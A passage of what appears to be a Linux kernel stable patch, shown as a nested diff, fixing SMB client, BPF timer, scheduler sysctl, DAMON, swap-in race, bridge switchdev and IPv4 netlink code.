+@@ -5010,6 +5010,9 @@ int SMB2_query_directory_init(const unsigned int xid,
+ 	case SMB_FIND_FILE_POSIX_INFO:
+ 		req->FileInformationClass = SMB_FIND_FILE_POSIX_INFO;
+ 		break;
++	case SMB_FIND_FILE_FULL_DIRECTORY_INFO:
++		req->FileInformationClass = FILE_FULL_DIRECTORY_INFORMATION;
++		break;
+ 	default:
+ 		cifs_tcon_dbg(VFS, "info level %u isn't supported\n",
+ 			info_level);
+@@ -5079,6 +5082,9 @@ smb2_parse_query_directory(struct cifs_tcon *tcon,
+ 		/* note that posix payload are variable size */
+ 		info_buf_size = sizeof(struct smb2_posix_info);
+ 		break;
++	case SMB_FIND_FILE_FULL_DIRECTORY_INFO:
++		info_buf_size = sizeof(FILE_FULL_DIRECTORY_INFO);
++		break;
+ 	default:
+ 		cifs_tcon_dbg(VFS, "info level %u isn't supported\n",
+ 			 srch_inf->info_level);
+diff --git a/fs/smb/client/transport.c b/fs/smb/client/transport.c
+index 8a1dd8407a3a7..df44acaec9ae9 100644
+--- a/fs/smb/client/transport.c
++++ b/fs/smb/client/transport.c
+@@ -427,10 +427,17 @@ __smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 						  server->conn_id, server->hostname);
+ 	}
+ smbd_done:
+-	if (rc < 0 && rc != -EINTR)
++	/*
++	 * there's hardly any use for the layers above to know the
++	 * actual error code here. All they should do at this point is
++	 * to retry the connection and hope it goes away.
++	 */
++	if (rc < 0 && rc != -EINTR && rc != -EAGAIN) {
+ 		cifs_server_dbg(VFS, "Error %d sending data on socket to server\n",
+ 			 rc);
+-	else if (rc > 0)
++		rc = -ECONNABORTED;
++		cifs_signal_cifsd_for_reconnect(server, false);
++	} else if (rc > 0)
+ 		rc = 0;
+ out:
+ 	cifs_in_send_dec(server);
+@@ -449,8 +456,8 @@ smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 	if (!(flags & CIFS_TRANSFORM_REQ))
+ 		return __smb_send_rqst(server, num_rqst, rqst);
+ 
+-	if (num_rqst > MAX_COMPOUND - 1)
+-		return -ENOMEM;
++	if (WARN_ON_ONCE(num_rqst > MAX_COMPOUND - 1))
++		return -EIO;
+ 
+ 	if (!server->ops->init_transform_rq) {
+ 		cifs_server_dbg(VFS, "Encryption requested but transform callback is missing\n");
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index 4a1911dcf834b..67313881f8ac1 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -337,6 +337,8 @@ enum rw_hint {
+ #define IOCB_NOIO		(1 << 20)
+ /* can use bio alloc cache */
+ #define IOCB_ALLOC_CACHE	(1 << 21)
++/* kiocb is a read or write operation submitted by fs/aio.c. */
++#define IOCB_AIO_RW		(1 << 23)
+ 
+ struct kiocb {
+ 	struct file		*ki_filp;
+diff --git a/include/linux/memblock.h b/include/linux/memblock.h
+index 50ad19662a322..6790f08066b72 100644
+--- a/include/linux/memblock.h
++++ b/include/linux/memblock.h
+@@ -118,6 +118,8 @@ int memblock_reserve(phys_addr_t base, phys_addr_t size);
+ int memblock_physmem_add(phys_addr_t base, phys_addr_t size);
+ #endif
+ void memblock_trim_memory(phys_addr_t align);
++unsigned long memblock_addrs_overlap(phys_addr_t base1, phys_addr_t size1,
++				     phys_addr_t base2, phys_addr_t size2);
+ bool memblock_overlaps_region(struct memblock_type *type,
+ 			      phys_addr_t base, phys_addr_t size);
+ int memblock_mark_hotplug(phys_addr_t base, phys_addr_t size);
+diff --git a/include/linux/socket.h b/include/linux/socket.h
+index b3c58042bd254..d79efd0268809 100644
+--- a/include/linux/socket.h
++++ b/include/linux/socket.h
+@@ -33,7 +33,10 @@ typedef __kernel_sa_family_t	sa_family_t;
+ 
+ struct sockaddr {
+ 	sa_family_t	sa_family;	/* address family, AF_xxx	*/
+-	char		sa_data[14];	/* 14 bytes of protocol address	*/
++	union {
++		char sa_data_min[14];		/* Minimum 14 bytes of protocol address	*/
++		DECLARE_FLEX_ARRAY(char, sa_data);
++	};
+ };
+ 
+ struct linger {
+diff --git a/include/linux/swap.h b/include/linux/swap.h
+index a18cf4b7c724c..add47f43e568e 100644
+--- a/include/linux/swap.h
++++ b/include/linux/swap.h
+@@ -571,6 +571,11 @@ static inline int swap_duplicate(swp_entry_t swp)
+ 	return 0;
+ }
+ 
++static inline int swapcache_prepare(swp_entry_t swp)
++{
++	return 0;
++}
++
+ static inline void swap_free(swp_entry_t swp)
+ {
+ }
+diff --git a/include/net/netfilter/nf_flow_table.h b/include/net/netfilter/nf_flow_table.h
+index dde4dd9c4012c..4a767b3d20b9d 100644
+--- a/include/net/netfilter/nf_flow_table.h
++++ b/include/net/netfilter/nf_flow_table.h
+@@ -274,8 +274,8 @@ nf_flow_table_offload_del_cb(struct nf_flowtable *flow_table,
+ 		flow_table->type->put(flow_table);
+ }
+ 
+-int flow_offload_route_init(struct flow_offload *flow,
+-			    const struct nf_flow_route *route);
++void flow_offload_route_init(struct flow_offload *flow,
++			     struct nf_flow_route *route);
+ 
+ int flow_offload_add(struct nf_flowtable *flow_table, struct flow_offload *flow);
+ void flow_offload_refresh(struct nf_flowtable *flow_table,
+diff --git a/include/net/switchdev.h b/include/net/switchdev.h
+index 7dcdc97c0bc33..a3d8f013adcd5 100644
+--- a/include/net/switchdev.h
++++ b/include/net/switchdev.h
+@@ -303,6 +303,9 @@ void switchdev_deferred_process(void);
+ int switchdev_port_attr_set(struct net_device *dev,
+ 			    const struct switchdev_attr *attr,
+ 			    struct netlink_ext_ack *extack);
++bool switchdev_port_obj_act_is_deferred(struct net_device *dev,
++					enum switchdev_notifier_type nt,
++					const struct switchdev_obj *obj);
+ int switchdev_port_obj_add(struct net_device *dev,
+ 			   const struct switchdev_obj *obj,
+ 			   struct netlink_ext_ack *extack);
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index 4c838f7290dd9..8ea1fba84eff9 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -2290,7 +2290,7 @@ struct tcp_ulp_ops {
+ 	/* cleanup ulp */
+ 	void (*release)(struct sock *sk);
+ 	/* diagnostic */
+-	int (*get_info)(const struct sock *sk, struct sk_buff *skb);
++	int (*get_info)(struct sock *sk, struct sk_buff *skb);
+ 	size_t (*get_info_size)(const struct sock *sk);
+ 	/* clone ulp */
+ 	void (*clone)(const struct request_sock *req, struct sock *newsk,
+diff --git a/include/scsi/scsi_device.h b/include/scsi/scsi_device.h
+index fdc31fdb612da..d2751ed536df2 100644
+--- a/include/scsi/scsi_device.h
++++ b/include/scsi/scsi_device.h
+@@ -100,10 +100,6 @@ struct scsi_vpd {
+ 	unsigned char	data[];
+ };
+ 
+-enum scsi_vpd_parameters {
+-	SCSI_VPD_HEADER_SIZE = 4,
+-};
+-
+ struct scsi_device {
+ 	struct Scsi_Host *host;
+ 	struct request_queue *request_queue;
+diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c
+index 6a61a98d602cd..83f8f67e933df 100644
+--- a/kernel/bpf/helpers.c
++++ b/kernel/bpf/helpers.c
+@@ -1091,6 +1091,7 @@ struct bpf_hrtimer {
+ 	struct bpf_prog *prog;
+ 	void __rcu *callback_fn;
+ 	void *value;
++	struct rcu_head rcu;
+ };
+ 
+ /* the actual struct hidden inside uapi struct bpf_timer */
+@@ -1312,6 +1313,7 @@ BPF_CALL_1(bpf_timer_cancel, struct bpf_timer_kern *, timer)
+ 
+ 	if (in_nmi())
+ 		return -EOPNOTSUPP;
++	rcu_read_lock();
+ 	__bpf_spin_lock_irqsave(&timer->lock);
+ 	t = timer->timer;
+ 	if (!t) {
+@@ -1333,6 +1335,7 @@ BPF_CALL_1(bpf_timer_cancel, struct bpf_timer_kern *, timer)
+ 	 * if it was running.
+ 	 */
+ 	ret = ret ?: hrtimer_cancel(&t->timer);
++	rcu_read_unlock();
+ 	return ret;
+ }
+ 
+@@ -1387,7 +1390,7 @@ void bpf_timer_cancel_and_free(void *val)
+ 	 */
+ 	if (this_cpu_read(hrtimer_running) != t)
+ 		hrtimer_cancel(&t->timer);
+-	kfree(t);
++	kfree_rcu(t, rcu);
+ }
+ 
+ BPF_CALL_2(bpf_kptr_xchg, void *, map_value, void *, ptr)
+diff --git a/kernel/sched/rt.c b/kernel/sched/rt.c
+index 76bafa8d331a7..3a2335bc1d58b 100644
+--- a/kernel/sched/rt.c
++++ b/kernel/sched/rt.c
+@@ -37,6 +37,8 @@ static struct ctl_table sched_rt_sysctls[] = {
+ 		.maxlen         = sizeof(unsigned int),
+ 		.mode           = 0644,
+ 		.proc_handler   = sched_rt_handler,
++		.extra1         = SYSCTL_ONE,
++		.extra2         = SYSCTL_INT_MAX,
+ 	},
+ 	{
+ 		.procname       = "sched_rt_runtime_us",
+@@ -44,6 +46,8 @@ static struct ctl_table sched_rt_sysctls[] = {
+ 		.maxlen         = sizeof(int),
+ 		.mode           = 0644,
+ 		.proc_handler   = sched_rt_handler,
++		.extra1         = SYSCTL_NEG_ONE,
++		.extra2         = SYSCTL_INT_MAX,
+ 	},
+ 	{
+ 		.procname       = "sched_rr_timeslice_ms",
+@@ -2970,9 +2974,6 @@ static int sched_rt_global_constraints(void)
+ #ifdef CONFIG_SYSCTL
+ static int sched_rt_global_validate(void)
+ {
+-	if (sysctl_sched_rt_period <= 0)
+-		return -EINVAL;
+-
+ 	if ((sysctl_sched_rt_runtime != RUNTIME_INF) &&
+ 		((sysctl_sched_rt_runtime > sysctl_sched_rt_period) ||
+ 		 ((u64)sysctl_sched_rt_runtime *
+@@ -3003,7 +3004,7 @@ static int sched_rt_handler(struct ctl_table *table, int write, void *buffer,
+ 	old_period = sysctl_sched_rt_period;
+ 	old_runtime = sysctl_sched_rt_runtime;
+ 
+-	ret = proc_dointvec(table, write, buffer, lenp, ppos);
++	ret = proc_dointvec_minmax(table, write, buffer, lenp, ppos);
+ 
+ 	if (!ret && write) {
+ 		ret = sched_rt_global_validate();
+@@ -3047,6 +3048,9 @@ static int sched_rr_handler(struct ctl_table *table, int write, void *buffer,
+ 		sched_rr_timeslice =
+ 			sysctl_sched_rr_timeslice <= 0 ? RR_TIMESLICE :
+ 			msecs_to_jiffies(sysctl_sched_rr_timeslice);
++
++		if (sysctl_sched_rr_timeslice <= 0)
++			sysctl_sched_rr_timeslice = jiffies_to_msecs(RR_TIMESLICE);
+ 	}
+ 	mutex_unlock(&mutex);
+ 
+diff --git a/mm/damon/lru_sort.c b/mm/damon/lru_sort.c
+index 63bdad20dbaf8..98a678129b067 100644
+--- a/mm/damon/lru_sort.c
++++ b/mm/damon/lru_sort.c
+@@ -185,9 +185,21 @@ static struct damos *damon_lru_sort_new_cold_scheme(unsigned int cold_thres)
+ 	return damon_lru_sort_new_scheme(&pattern, DAMOS_LRU_DEPRIO);
+ }
+ 
++static void damon_lru_sort_copy_quota_status(struct damos_quota *dst,
++		struct damos_quota *src)
++{
++	dst->total_charged_sz = src->total_charged_sz;
++	dst->total_charged_ns = src->total_charged_ns;
++	dst->charged_sz = src->charged_sz;
++	dst->charged_from = src->charged_from;
++	dst->charge_target_from = src->charge_target_from;
++	dst->charge_addr_from = src->charge_addr_from;
++}
++
+ static int damon_lru_sort_apply_parameters(void)
+ {
+-	struct damos *scheme;
++	struct damos *scheme, *hot_scheme, *cold_scheme;
++	struct damos *old_hot_scheme = NULL, *old_cold_scheme = NULL;
+ 	unsigned int hot_thres, cold_thres;
+ 	int err = 0;
+ 
+@@ -195,18 +207,35 @@ static int damon_lru_sort_apply_parameters(void)
+ 	if (err)
+ 		return err;
+ 
++	damon_for_each_scheme(scheme, ctx) {
++		if (!old_hot_scheme) {
++			old_hot_scheme = scheme;
++			continue;
++		}
++		old_cold_scheme = scheme;
++	}
++
+ 	hot_thres = damon_max_nr_accesses(&damon_lru_sort_mon_attrs) *
+ 		hot_thres_access_freq / 1000;
+-	scheme = damon_lru_sort_new_hot_scheme(hot_thres);
+-	if (!scheme)
++	hot_scheme = damon_lru_sort_new_hot_scheme(hot_thres);
++	if (!hot_scheme)
+ 		return -ENOMEM;
+-	damon_set_schemes(ctx, &scheme, 1);
++	if (old_hot_scheme)
++		damon_lru_sort_copy_quota_status(&hot_scheme->quota,
++				&old_hot_scheme->quota);
+ 
+ 	cold_thres = cold_min_age / damon_lru_sort_mon_attrs.aggr_interval;
+-	scheme = damon_lru_sort_new_cold_scheme(cold_thres);
+-	if (!scheme)
++	cold_scheme = damon_lru_sort_new_cold_scheme(cold_thres);
++	if (!cold_scheme) {
++		damon_destroy_scheme(hot_scheme);
+ 		return -ENOMEM;
+-	damon_add_scheme(ctx, scheme);
++	}
++	if (old_cold_scheme)
++		damon_lru_sort_copy_quota_status(&cold_scheme->quota,
++				&old_cold_scheme->quota);
++
++	damon_set_schemes(ctx, &hot_scheme, 1);
++	damon_add_scheme(ctx, cold_scheme);
+ 
+ 	return damon_set_region_biggest_system_ram_default(target,
+ 					&monitor_region_start,
+diff --git a/mm/damon/reclaim.c b/mm/damon/reclaim.c
+index 162c9b1ca00fd..cc337e94acfda 100644
+--- a/mm/damon/reclaim.c
++++ b/mm/damon/reclaim.c
+@@ -141,9 +141,20 @@ static struct damos *damon_reclaim_new_scheme(void)
+ 			&damon_reclaim_wmarks);
+ }
+ 
++static void damon_reclaim_copy_quota_status(struct damos_quota *dst,
++		struct damos_quota *src)
++{
++	dst->total_charged_sz = src->total_charged_sz;
++	dst->total_charged_ns = src->total_charged_ns;
++	dst->charged_sz = src->charged_sz;
++	dst->charged_from = src->charged_from;
++	dst->charge_target_from = src->charge_target_from;
++	dst->charge_addr_from = src->charge_addr_from;
++}
++
+ static int damon_reclaim_apply_parameters(void)
+ {
+-	struct damos *scheme;
++	struct damos *scheme, *old_scheme;
+ 	int err = 0;
+ 
+ 	err = damon_set_attrs(ctx, &damon_reclaim_mon_attrs);
+@@ -154,6 +165,11 @@ static int damon_reclaim_apply_parameters(void)
+ 	scheme = damon_reclaim_new_scheme();
+ 	if (!scheme)
+ 		return -ENOMEM;
++	if (!list_empty(&ctx->schemes)) {
++		damon_for_each_scheme(old_scheme, ctx)
++			damon_reclaim_copy_quota_status(&scheme->quota,
++					&old_scheme->quota);
++	}
+ 	damon_set_schemes(ctx, &scheme, 1);
+ 
+ 	return damon_set_region_biggest_system_ram_default(target,
+diff --git a/mm/memblock.c b/mm/memblock.c
+index 511d4783dcf1d..516efec80851a 100644
+--- a/mm/memblock.c
++++ b/mm/memblock.c
+@@ -175,8 +175,9 @@ static inline phys_addr_t memblock_cap_size(phys_addr_t base, phys_addr_t *size)
+ /*
+  * Address comparison utilities
+  */
+-static unsigned long __init_memblock memblock_addrs_overlap(phys_addr_t base1, phys_addr_t size1,
+-				       phys_addr_t base2, phys_addr_t size2)
++unsigned long __init_memblock
++memblock_addrs_overlap(phys_addr_t base1, phys_addr_t size1, phys_addr_t base2,
++		       phys_addr_t size2)
+ {
+ 	return ((base1 < (base2 + size2)) && (base2 < (base1 + size1)));
+ }
+diff --git a/mm/memcontrol.c b/mm/memcontrol.c
+index 9da98e3e71cfe..4570d3e315cf1 100644
+--- a/mm/memcontrol.c
++++ b/mm/memcontrol.c
+@@ -7517,9 +7517,13 @@ bool mem_cgroup_swap_full(struct folio *folio)
+ 
+ static int __init setup_swap_account(char *s)
+ {
+-	pr_warn_once("The swapaccount= commandline option is deprecated. "
+-		     "Please report your usecase to linux-mm@kvack.org if you "
+-		     "depend on this functionality.\n");
++	bool res;
++
++	if (!kstrtobool(s, &res) && !res)
++		pr_warn_once("The swapaccount=0 commandline option is deprecated "
++			     "in favor of configuring swap control via cgroupfs. "
++			     "Please report your usecase to linux-mm@kvack.org if you "
++			     "depend on this functionality.\n");
+ 	return 1;
+ }
+ __setup("swapaccount=", setup_swap_account);
+diff --git a/mm/memory.c b/mm/memory.c
+index fc8b264ec0cac..fb83cf56377ab 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -3761,6 +3761,7 @@ vm_fault_t do_swap_page(struct vm_fault *vmf)
+ 	struct page *page;
+ 	struct swap_info_struct *si = NULL;
+ 	rmap_t rmap_flags = RMAP_NONE;
++	bool need_clear_cache = false;
+ 	bool exclusive = false;
+ 	swp_entry_t entry;
+ 	pte_t pte;
+@@ -3822,6 +3823,20 @@ vm_fault_t do_swap_page(struct vm_fault *vmf)
+ 	if (!folio) {
+ 		if (data_race(si->flags & SWP_SYNCHRONOUS_IO) &&
+ 		    __swap_count(entry) == 1) {
++			/*
++			 * Prevent parallel swapin from proceeding with
++			 * the cache flag. Otherwise, another thread may
++			 * finish swapin first, free the entry, and swapout
++			 * reusing the same entry. It's undetectable as
++			 * pte_same() returns true due to entry reuse.
++			 */
++			if (swapcache_prepare(entry)) {
++				/* Relax a bit to prevent rapid repeated page faults */
++				schedule_timeout_uninterruptible(1);
++				goto out;
++			}
++			need_clear_cache = true;
++
+ 			/* skip swapcache */
+ 			folio = vma_alloc_folio(GFP_HIGHUSER_MOVABLE, 0,
+ 						vma, vmf->address, false);
+@@ -4073,6 +4088,9 @@ vm_fault_t do_swap_page(struct vm_fault *vmf)
+ unlock:
+ 	pte_unmap_unlock(vmf->pte, vmf->ptl);
+ out:
++	/* Clear the swap cache pin for direct swapin after PTL unlock */
++	if (need_clear_cache)
++		swapcache_clear(si, entry);
+ 	if (si)
+ 		put_swap_device(si);
+ 	return ret;
+@@ -4086,6 +4104,8 @@ vm_fault_t do_swap_page(struct vm_fault *vmf)
+ 		folio_unlock(swapcache);
+ 		folio_put(swapcache);
+ 	}
++	if (need_clear_cache)
++		swapcache_clear(si, entry);
+ 	if (si)
+ 		put_swap_device(si);
+ 	return ret;
+diff --git a/mm/swap.h b/mm/swap.h
+index cc08c459c6190..5eff40ef76934 100644
+--- a/mm/swap.h
++++ b/mm/swap.h
+@@ -39,6 +39,7 @@ void __delete_from_swap_cache(struct folio *folio,
+ void delete_from_swap_cache(struct folio *folio);
+ void clear_shadow_from_swap_cache(int type, unsigned long begin,
+ 				  unsigned long end);
++void swapcache_clear(struct swap_info_struct *si, swp_entry_t entry);
+ struct folio *swap_cache_get_folio(swp_entry_t entry,
+ 		struct vm_area_struct *vma, unsigned long addr);
+ struct page *find_get_incore_page(struct address_space *mapping, pgoff_t index);
+@@ -98,6 +99,10 @@ static inline int swap_writepage(struct page *p, struct writeback_control *wbc)
+ 	return 0;
+ }
+ 
++static inline void swapcache_clear(struct swap_info_struct *si, swp_entry_t entry)
++{
++}
++
+ static inline struct folio *swap_cache_get_folio(swp_entry_t entry,
+ 		struct vm_area_struct *vma, unsigned long addr)
+ {
+diff --git a/mm/swapfile.c b/mm/swapfile.c
+index 71db6d8a1ea30..cca9fda9d036f 100644
+--- a/mm/swapfile.c
++++ b/mm/swapfile.c
+@@ -3373,6 +3373,19 @@ int swapcache_prepare(swp_entry_t entry)
+ 	return __swap_duplicate(entry, SWAP_HAS_CACHE);
+ }
+ 
++void swapcache_clear(struct swap_info_struct *si, swp_entry_t entry)
++{
++	struct swap_cluster_info *ci;
++	unsigned long offset = swp_offset(entry);
++	unsigned char usage;
++
++	ci = lock_cluster_or_swap_info(si, offset);
++	usage = __swap_entry_free_locked(si, offset, SWAP_HAS_CACHE);
++	unlock_cluster_or_swap_info(si, ci);
++	if (!usage)
++		free_swap_slot(entry);
++}
++
+ struct swap_info_struct *swp_swap_info(swp_entry_t entry)
+ {
+ 	return swap_type_to_swap_info(swp_type(entry));
+diff --git a/mm/zswap.c b/mm/zswap.c
+index b3829ada4a413..b7cb126797f9e 100644
+--- a/mm/zswap.c
++++ b/mm/zswap.c
+@@ -1013,6 +1013,8 @@ static int zswap_writeback_entry(struct zpool *pool, unsigned long handle)
+ 		if (zswap_rb_search(&tree->rbroot, entry->offset) != entry) {
+ 			spin_unlock(&tree->lock);
+ 			delete_from_swap_cache(page_folio(page));
++			unlock_page(page);
++			put_page(page);
+ 			ret = -ENOMEM;
+ 			goto fail;
+ 		}
+diff --git a/net/bridge/br_switchdev.c b/net/bridge/br_switchdev.c
+index 4b3982c368b35..b61ef2dff7a4b 100644
+--- a/net/bridge/br_switchdev.c
++++ b/net/bridge/br_switchdev.c
+@@ -593,21 +593,40 @@ br_switchdev_mdb_replay_one(struct notifier_block *nb, struct net_device *dev,
+ }
+ 
+ static int br_switchdev_mdb_queue_one(struct list_head *mdb_list,
++				      struct net_device *dev,
++				      unsigned long action,
+ 				      enum switchdev_obj_id id,
+ 				      const struct net_bridge_mdb_entry *mp,
+ 				      struct net_device *orig_dev)
+ {
+-	struct switchdev_obj_port_mdb *mdb;
++	struct switchdev_obj_port_mdb mdb = {
++		.obj = {
++			.id = id,
++			.orig_dev = orig_dev,
++		},
++	};
++	struct switchdev_obj_port_mdb *pmdb;
+ 
+-	mdb = kzalloc(sizeof(*mdb), GFP_ATOMIC);
+-	if (!mdb)
+-		return -ENOMEM;
++	br_switchdev_mdb_populate(&mdb, mp);
++
++	if (action == SWITCHDEV_PORT_OBJ_ADD &&
++	    switchdev_port_obj_act_is_deferred(dev, action, &mdb.obj)) {
++		/* This event is already in the deferred queue of
++		 * events, so this replay must be elided, lest the
++		 * driver receives duplicate events for it. This can
++		 * only happen when replaying additions, since
++		 * modifications are always immediately visible in
++		 * br->mdb_list, whereas actual event delivery may be
++		 * delayed.
++		 */
++		return 0;
++	}
+ 
+-	mdb->obj.id = id;
+-	mdb->obj.orig_dev = orig_dev;
+-	br_switchdev_mdb_populate(mdb, mp);
+-	list_add_tail(&mdb->obj.list, mdb_list);
++	pmdb = kmemdup(&mdb, sizeof(mdb), GFP_ATOMIC);
++	if (!pmdb)
++		return -ENOMEM;
+ 
++	list_add_tail(&pmdb->obj.list, mdb_list);
+ 	return 0;
+ }
+ 
+@@ -675,51 +694,50 @@ br_switchdev_mdb_replay(struct net_device *br_dev, struct net_device *dev,
+ 	if (!br_opt_get(br, BROPT_MULTICAST_ENABLED))
+ 		return 0;
+ 
+-	/* We cannot walk over br->mdb_list protected just by the rtnl_mutex,
+-	 * because the write-side protection is br->multicast_lock. But we
+-	 * need to emulate the [ blocking ] calling context of a regular
+-	 * switchdev event, so since both br->multicast_lock and RCU read side
+-	 * critical sections are atomic, we have no choice but to pick the RCU
+-	 * read side lock, queue up all our events, leave the critical section
+-	 * and notify switchdev from blocking context.
++	if (adding)
++		action = SWITCHDEV_PORT_OBJ_ADD;
++	else
++		action = SWITCHDEV_PORT_OBJ_DEL;
++
++	/* br_switchdev_mdb_queue_one() will take care to not queue a
++	 * replay of an event that is already pending in the switchdev
++	 * deferred queue. In order to safely determine that, there
++	 * must be no new deferred MDB notifications enqueued for the
++	 * duration of the MDB scan. Therefore, grab the write-side
++	 * lock to avoid racing with any concurrent IGMP/MLD snooping.
+ 	 */
+-	rcu_read_lock();
++	spin_lock_bh(&br->multicast_lock);
+ 
+-	hlist_for_each_entry_rcu(mp, &br->mdb_list, mdb_node) {
++	hlist_for_each_entry(mp, &br->mdb_list, mdb_node) {
+ 		struct net_bridge_port_group __rcu * const *pp;
+ 		const struct net_bridge_port_group *p;
+ 
+ 		if (mp->host_joined) {
+-			err = br_switchdev_mdb_queue_one(&mdb_list,
++			err = br_switchdev_mdb_queue_one(&mdb_list, dev, action,
+ 							 SWITCHDEV_OBJ_ID_HOST_MDB,
+ 							 mp, br_dev);
+ 			if (err) {
+-				rcu_read_unlock();
++				spin_unlock_bh(&br->multicast_lock);
+ 				goto out_free_mdb;
+ 			}
+ 		}
+ 
+-		for (pp = &mp->ports; (p = rcu_dereference(*pp)) != NULL;
++		for (pp = &mp->ports; (p = mlock_dereference(*pp, br)) != NULL;
+ 		     pp = &p->next) {
+ 			if (p->key.port->dev != dev)
+ 				continue;
+ 
+-			err = br_switchdev_mdb_queue_one(&mdb_list,
++			err = br_switchdev_mdb_queue_one(&mdb_list, dev, action,
+ 							 SWITCHDEV_OBJ_ID_PORT_MDB,
+ 							 mp, dev);
+ 			if (err) {
+-				rcu_read_unlock();
++				spin_unlock_bh(&br->multicast_lock);
+ 				goto out_free_mdb;
+ 			}
+ 		}
+ 	}
+ 
+-	rcu_read_unlock();
+-
+-	if (adding)
+-		action = SWITCHDEV_PORT_OBJ_ADD;
+-	else
+-		action = SWITCHDEV_PORT_OBJ_DEL;
++	spin_unlock_bh(&br->multicast_lock);
+ 
+ 	list_for_each_entry(obj, &mdb_list, list) {
+ 		err = br_switchdev_mdb_replay_one(nb, dev,
+@@ -780,6 +798,16 @@ static void nbp_switchdev_unsync_objs(struct net_bridge_port *p,
+ 	br_switchdev_mdb_replay(br_dev, dev, ctx, false, blocking_nb, NULL);
+ 
+ 	br_switchdev_vlan_replay(br_dev, ctx, false, blocking_nb, NULL);
++
++	/* Make sure that the device leaving this bridge has seen all
++	 * relevant events before it is disassociated. In the normal
++	 * case, when the device is directly attached to the bridge,
++	 * this is covered by del_nbp(). If the association was indirect
++	 * however, e.g. via a team or bond, and the device is leaving
++	 * that intermediate device, then the bridge port remains in
++	 * place.
++	 */
++	switchdev_deferred_process();
+ }
+ 
+ /* Let the bridge know that this port is offloaded, so that it can assign a
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 1ba3662faf0aa..60619fe8af5fc 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -8861,7 +8861,7 @@ EXPORT_SYMBOL(dev_set_mac_address_user);
+ 
+ int dev_get_mac_address(struct sockaddr *sa, struct net *net, char *dev_name)
+ {
+-	size_t size = sizeof(sa->sa_data);
++	size_t size = sizeof(sa->sa_data_min);
+ 	struct net_device *dev;
+ 	int ret = 0;
+ 
+diff --git a/net/core/dev_ioctl.c b/net/core/dev_ioctl.c
+index 7674bb9f3076c..5cdbfbf9a7dcf 100644
+--- a/net/core/dev_ioctl.c
++++ b/net/core/dev_ioctl.c
+@@ -342,7 +342,7 @@ static int dev_ifsioc(struct net *net, struct ifreq *ifr, void __user *data,
+ 		if (ifr->ifr_hwaddr.sa_family != dev->type)
+ 			return -EINVAL;
+ 		memcpy(dev->broadcast, ifr->ifr_hwaddr.sa_data,
+-		       min(sizeof(ifr->ifr_hwaddr.sa_data),
++		       min(sizeof(ifr->ifr_hwaddr.sa_data_min),
+ 			   (size_t)dev->addr_len));
+ 		call_netdevice_notifiers(NETDEV_CHANGEADDR, dev);
+ 		return 0;
+diff --git a/net/core/skmsg.c b/net/core/skmsg.c
+index 3818035ea0021..39643f78cf782 100644
+--- a/net/core/skmsg.c
++++ b/net/core/skmsg.c
+@@ -1217,8 +1217,11 @@ static void sk_psock_verdict_data_ready(struct sock *sk)
+ 
+ 		rcu_read_lock();
+ 		psock = sk_psock(sk);
+-		if (psock)
+-			psock->saved_data_ready(sk);
++		if (psock) {
++			read_lock_bh(&sk->sk_callback_lock);
++			sk_psock_data_ready(sk, psock);
++			read_unlock_bh(&sk->sk_callback_lock);
++		}
+ 		rcu_read_unlock();
+ 	}
+ }
+diff --git a/net/ipv4/arp.c b/net/ipv4/arp.c
+index 9456f5bb35e5d..ccff96820a703 100644
+--- a/net/ipv4/arp.c
++++ b/net/ipv4/arp.c
+@@ -1125,7 +1125,8 @@ static int arp_req_get(struct arpreq *r, struct net_device *dev)
+ 	if (neigh) {
+ 		if (!(READ_ONCE(neigh->nud_state) & NUD_NOARP)) {
+ 			read_lock_bh(&neigh->lock);
+-			memcpy(r->arp_ha.sa_data, neigh->ha, dev->addr_len);
++			memcpy(r->arp_ha.sa_data, neigh->ha,
++			       min(dev->addr_len, (unsigned char)sizeof(r->arp_ha.sa_data_min)));
+ 			r->arp_flags = arp_state_to_flags(neigh);
+ 			read_unlock_bh(&neigh->lock);
+ 			r->arp_ha.sa_family = dev->type;
+diff --git a/net/ipv4/devinet.c b/net/ipv4/devinet.c
+index 35d6e74be8406..bb0d1252cad86 100644
+--- a/net/ipv4/devinet.c
++++ b/net/ipv4/devinet.c
+@@ -1804,6 +1804,21 @@ static int in_dev_dump_addr(struct in_device *in_dev, struct sk_buff *skb,
+ 	return err;
+ }
+ 
++/* Combine dev_addr_genid and dev_base_seq to detect changes.
++ */
++static u32 inet_base_seq(const struct net *net)
++{
++	u32 res = atomic_read(&net->ipv4.dev_addr_genid) +
++		  net->dev_base_seq;
++
++	/* Must not return 0 (see nl_dump_check_consistent()).
++	 * Chose a value far away from 0.
++	 */
++	if (!res)
++		res = 0x80000000;
++	return res;
++}
++
+ static int inet_dump_ifaddr(struct sk_buff *skb, struct netlink_callback *cb)
+ {
+ 	const struct nlmsghdr *nlh = cb->nlh;
+@@ -1855,8 +1870,7 @@ static int inet_dump_ifaddr(struct sk_buff *skb, struct netlink_callback *cb)
+ 		idx = 0;
+ 		head = &tgt_net->dev_index_head[h];
+ 		rcu_read_lock();
+-		cb->seq = atomic_read(&tgt_net->ipv4.dev_addr_genid) ^
+-			  tgt_net->dev_base_seq;
++		cb->seq = inet_base_seq(tgt_net);
+ 		hlist_for_each_entry_rcu(dev, head, index_hlist) {
+ 			if (idx < s_idx)
+ 				goto cont;
+@@ -2257,8 +2271,7 @@ static int inet_netconf_dump_devconf(struct sk_buff *skb,
+ 		idx = 0;
+ 		head = &net->dev_index_head[h];
+ 		rcu_read_lock();
+-		cb->seq = atomic_read(&net->ipv4.dev_addr_genid) ^
+-			  net->dev_base_seq;
++		cb->seq = inet_base_seq(net);
+ 		hlist_for_each_entry_rcu(dev, head, index_hlist) {
+ 			if (idx < s_idx)
+ 				goto cont;
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index f2ed2aed08ab3..56776e1b1de52 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -1111,10 +1111,33 @@ int __inet_hash_connect(struct inet_timewait_death_row *death_row,
+ 	return 0;
+ 
+ error:
